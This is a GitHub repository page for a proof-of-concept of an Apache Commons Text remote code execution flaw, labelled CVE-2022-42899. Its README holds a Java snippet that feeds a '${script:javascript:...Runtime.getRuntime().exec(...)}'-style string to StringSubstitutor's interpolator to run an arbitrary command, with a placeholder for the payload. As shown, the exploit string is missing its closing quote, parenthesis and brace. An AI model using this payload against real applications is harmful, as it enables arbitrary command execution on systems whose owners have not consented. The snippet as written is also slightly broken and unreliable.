Skip to content

iamsanjay/CVE-2022-42899

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-42899

Apache Common Text starting from version 1.5 to 1.9 has Remote code execution vulnerability CVE-2022-42899.

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages